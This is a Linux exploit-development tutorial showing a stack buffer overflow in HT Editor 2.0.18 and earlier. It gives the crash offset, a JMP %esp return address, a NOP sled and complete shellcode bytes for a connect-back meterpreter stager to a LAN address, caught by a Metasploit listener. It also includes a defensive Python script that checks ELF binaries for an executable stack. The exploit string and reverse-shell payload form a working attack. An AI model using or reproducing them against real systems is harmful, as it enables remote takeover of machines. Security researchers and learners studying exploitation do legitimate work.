Linux exploit development part 2

This document is a tutorial demonstrating a buffer overflow exploit on the HT Editor application, utilizing techniques from a previous tutorial. It outlines the requirements, steps for compiling the vulnerable application, and how to trigger the exploit using GDB and Metasploit. The author emphasizes that this is a demonstration and not a comprehensive guide on buffer overflows.


Linux exploit development part 2 (rev 2) - Real app demo (part 2)

This will be a short tutorial demonstrating a "buffer overflow" exploit on a real, freely available
application, using the techniques covered in part 2 of my tutorial series. If you have not read it,
you can check it out here:

Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg

NOTE:
* This paper will not go in depth with explanations (as this has already been covered in
the tutorial mentioned above).
* This paper will not teach you about "buffer overflows" (as mentioned this is just a
demonstration).
* I am not responsible for anything you do with this knowledge.

Requirements:
* The required knowledge for this can be found in the previous mentioned paper.
* You will need a Debian Squeeze (latest).
* Backtrack 4 R2 (Or any other distribution with Metasploit on it).
* Some GDB knowledge.
* checksec.sh (a very useful script).
* The vulnerable application (HT Editor <= 2.0.18)

If you do not possess the required knowledge, I cannot guarantee that this paper will be
beneficial for you.

Let us begin!

Author: sickness
Blog: http://sickness.tor.hu
Date: 10.04.2011
Compiling and checking our vulnerable application.

As you have probably expected, the vulnerable application will be taken from exploit-db; the
application is called “HT Editor”. (I did not discover this vulnerability, I am just reproducing it.)

You can download the application from: exploit-db.com or sourceforge.net (The version has to
be <= 2.0.18).

Now that we have the application let’s go ahead and compile it by typing:

##############################
./configure
##############################

This is what the configure output should look like (make sure you try to make yours look the same).

Figure 1.

After obtaining the same output we still need to make some changes in the Makefile to turn off
NX: we just need to add the “-z execstack” flag to some lines.

Figure 2.

##############################
make
make install
##############################

We have our application up and running; now let’s see what protections it has using
checksec.sh (again, make sure the results match, otherwise the exploit might not work).

Figure 3.

As we see there are no protections, let us move on.
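The NX check that checksec.sh performs in Figure 3 comes down to reading the binary's PT_GNU_STACK program header, which is exactly the header the “-z execstack” link flag marks as executable. The following is an added example, not part of the original paper or of HT Editor; the helper names are hypothetical and the embedded ELF header bytes are constructed test data:

```python
import struct

PT_GNU_STACK = 0x6474E551  # GNU extension header describing stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def check_nx(elf: bytes) -> str:
    """Report the stack permission of an ELF32/ELF64 image, like checksec.sh."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = elf[4] == 2                     # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if elf[5] == 1 else ">"   # EI_DATA: 1 = little, 2 = big
    fmt = "HHIQQQIHHH" if is64 else "HHIIIIIHHH"
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum
    _, _, _, _, phoff, _, _, _, phentsize, phnum = struct.unpack_from(endian + fmt, elf, 16)
    for i in range(phnum):
        off = phoff + i * phentsize
        p_type = struct.unpack_from(endian + "I", elf, off)[0]
        # p_flags follows p_type directly in Phdr64 but sits at offset 24 in Phdr32
        p_flags = struct.unpack_from(endian + "I", elf, off + (4 if is64 else 24))[0]
        if p_type == PT_GNU_STACK:
            return "NX disabled" if p_flags & PF_X else "NX enabled"
    # No PT_GNU_STACK at all: the loader falls back to the kernel default,
    # which on x86 Linux is an executable stack, so report it as a finding.
    return "NX disabled (no PT_GNU_STACK header)"


def build_elf32(stack_flags=None) -> bytes:
    """Constructed sample: a bare ELF32 little-endian header plus, optionally,
    one PT_GNU_STACK program header. Test data only, not a loadable binary."""
    phnum = 0 if stack_flags is None else 1
    ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, phnum, 0, 0, 0)
    if stack_flags is None:
        return ehdr
    # p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
    return ehdr + struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10)


if __name__ == "__main__":
    print("default link :", check_nx(build_elf32(PF_R | PF_W)))         # NX enabled
    print("-z execstack :", check_nx(build_elf32(PF_R | PF_W | PF_X)))  # NX disabled
```

On a real file, `check_nx(open(path, "rb").read())` gives the same verdict as the NX column of checksec.sh, so it can be used to confirm that a production build was not linked with “-z execstack”.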

Open application in debugger and trigger the exception.

Now we open our application in GDB and send it some junk to see its behaviour. After a few
tries we see that the offset needed for an exception to occur is “4108”.

Figure 4.

Once you send the junk the image might look something like this (could happen only here).

Figure 5.

If this happens just type in gdb “shell clear” and press ENTER.

Ok so far so good! Now let’s check the registers and see what we have.

Figure 6.

We have overwritten EBX, ESI, EDI and EIP. If we take a look at ESP we see that it points
to our buffer, which actually goes a little higher.

Figure 7.

After a few tries we see that the offset needed before the EIP overwrite is 4073. We send the
application more junk and check ESP again.

Figure 8.

Figure 9.

So ESP actually points right after the EIP overwrite occurs, now we can make our exploit
skeleton which should look like this:

##############################
JUNK + 4073 + EIP (Overwrite with a JMP/CALL %esp instruction) + NOP Sled + SC
##############################

Finding the right instruction.

First things first, let’s find our JMP/CALL %esp instruction.

Figure 10.

There are a lot of valid JMP/CALL %esp instructions; we are just going to choose “0x0818f8ff”.
Now for our shellcode: this time we will use a meterpreter (as it is more fun).

Figure 11.

Now let us see what the exploit should look like:

##############################
"\x41" * 4073 (JUNK) + "\xff\xf8\x18\x08" (JMP %esp) + "\x90" * 30 (NOP Sled)
+ "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x01\x42\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1" (Shell Code)
##############################

Setting up a listener and testing the exploit.

First let’s set up a listener in Metasploit.

Figure 12.

And this is what happens when we run the exploit inside GDB.

Figure 13.

Now reboot the system and let’s try again.

Figure 14.

Figure 15.

Figure 16.

BOOM, a meterpreter session!

Watch quick video demo: Linux exploit development part 2 (rev 2) - Demo

Thanks go to:
1. Contributors: Alexandre Maloteaux (troulouliou) and jduck for their great help!
2. Reviewers: g0tmi1k for taking the time to review my paper!
